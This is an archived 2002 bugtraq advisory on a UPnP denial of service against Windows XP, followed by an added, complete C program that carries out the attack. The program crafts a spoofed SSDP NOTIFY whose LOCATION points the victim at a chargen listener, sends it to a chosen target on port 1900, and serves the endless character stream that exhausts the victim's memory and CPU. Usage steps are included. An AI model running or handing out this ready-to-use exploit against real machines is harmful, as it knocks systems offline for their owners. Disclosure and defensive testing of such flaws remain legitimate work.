[23788] in bugtraq
UPNP Denial of Service
daemon@ATHENA.MIT.EDU (Gabriel Maggiotti)
Wed Jan 9 23:20:02 2002
Date: Wed, 9 Jan 2002 10:56:51 -0300
Message-ID: <BABA092F5BB47847AF2A72C6539EC37F6CA7E8@cdo01.biycsa.net>
From: "Gabriel Maggiotti" <gmaggiotti@biycsa.com.ar>
To: <bugtraq@securityfocus.com>
We developed a code baseline to test the UPnP DoS. The DoS consists of
sending a UDP packet to port 1900 with a NOTIFY request. This request
has a URL that XP uses to open a TCP connection. XP does not
sanitize this request, so any URL and port can be specified. Once
the TCP connection is opened, a chargen server fills the XP memory and the
machine gets into an unstable state with 100% CPU utilization.

Gabriel Maggiotti, Fernando Oubiña

<<chargen.c>> <<upnp_udp.c>>
Attachments: chargen.c, upnp_udp.c
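The two halves of the technique described above, as an added example that is not the posted chargen.c or upnp_udp.c (those attachments are not reproduced here): one function builds the SSDP NOTIFY datagram whose LOCATION header points the receiver at an attacker-chosen host:port, and one generates the RFC 864 chargen pattern that the TCP listener streams back once the victim connects. The LOCATION path (/device.xml), NT, USN and SERVER values are assumed placeholders, not values taken from the original code; the only field that matters for the behaviour described is LOCATION. Run it only against hosts you are authorised to test.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <signal.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Build an SSDP NOTIFY (ssdp:alive) whose LOCATION header points the
 * receiver at an arbitrary host:port. The device-description path and
 * the NT/USN/SERVER values are placeholders (assumption, not from the
 * original post). Returns the packet length, or -1 if it does not fit. */
int build_notify(char *buf, size_t buflen, const char *host, int port)
{
    int n = snprintf(buf, buflen,
        "NOTIFY * HTTP/1.1\r\n"
        "HOST: 239.255.255.250:1900\r\n"
        "CACHE-CONTROL: max-age=1800\r\n"
        "LOCATION: http://%s:%d/device.xml\r\n"
        "NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
        "NTS: ssdp:alive\r\n"
        "SERVER: Example/1.0 UPnP/1.0 Example/1.0\r\n"
        "USN: uuid:00000000-0000-0000-0000-000000000000::"
        "urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
        "\r\n", host, port);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}

/* RFC 864 chargen pattern: line i is 72 printable characters starting
 * at offset i into the 95-character printable ASCII range (' '..'~'),
 * followed by CRLF. Writes 74 bytes plus a NUL terminator into out,
 * which must hold at least 75 bytes. */
void chargen_line(int i, char *out)
{
    for (int k = 0; k < 72; k++)
        out[k] = (char)(' ' + (i + k) % 95);
    out[72] = '\r';
    out[73] = '\n';
    out[74] = '\0';
}

/* Usage: upnp_dos serve <port>                      chargen TCP listener
 *        upnp_dos notify <target-ip> <host> <port>  send NOTIFY to target */
int main(int argc, char **argv)
{
    if (argc == 3 && strcmp(argv[1], "serve") == 0) {
        signal(SIGPIPE, SIG_IGN);            /* peer dropping must not kill us */
        int s = socket(AF_INET, SOCK_STREAM, 0);
        int one = 1;
        setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
        struct sockaddr_in a;
        memset(&a, 0, sizeof a);
        a.sin_family = AF_INET;
        a.sin_addr.s_addr = htonl(INADDR_ANY);
        a.sin_port = htons((uint16_t)atoi(argv[2]));
        if (bind(s, (struct sockaddr *)&a, sizeof a) < 0 || listen(s, 5) < 0) {
            perror("listen");
            return 1;
        }
        for (;;) {
            int c = accept(s, NULL, NULL);
            if (c < 0)
                continue;
            char line[75];
            /* Stream the rotating pattern until the client goes away. */
            for (int i = 0; ; i++) {
                chargen_line(i % 95, line);
                if (send(c, line, 74, 0) != 74)
                    break;
            }
            close(c);
        }
    }
    if (argc == 5 && strcmp(argv[1], "notify") == 0) {
        char pkt[1024];
        int n = build_notify(pkt, sizeof pkt, argv[3], atoi(argv[4]));
        if (n < 0)
            return 1;
        int s = socket(AF_INET, SOCK_DGRAM, 0);
        struct sockaddr_in d;
        memset(&d, 0, sizeof d);
        d.sin_family = AF_INET;
        d.sin_port = htons(1900);            /* SSDP port on the target */
        if (inet_pton(AF_INET, argv[2], &d.sin_addr) != 1)
            return 1;
        if (sendto(s, pkt, (size_t)n, 0, (struct sockaddr *)&d, sizeof d) < 0) {
            perror("sendto");
            return 1;
        }
        close(s);
        return 0;
    }
    fprintf(stderr, "usage: %s serve <port> | notify <target-ip> <host> <port>\n", argv[0]);
    return 2;
}
```

Start the listener first (`serve 19`), then send the NOTIFY with LOCATION pointing back at the listener's address and port; the original post's observation is that the receiver connects to whatever LOCATION names, so the listener's address need not be the sender's. The same build_notify output is also a useful test vector for an SSDP parser: a receiver that fetches LOCATION without bounding the response is exactly what the chargen side exploits.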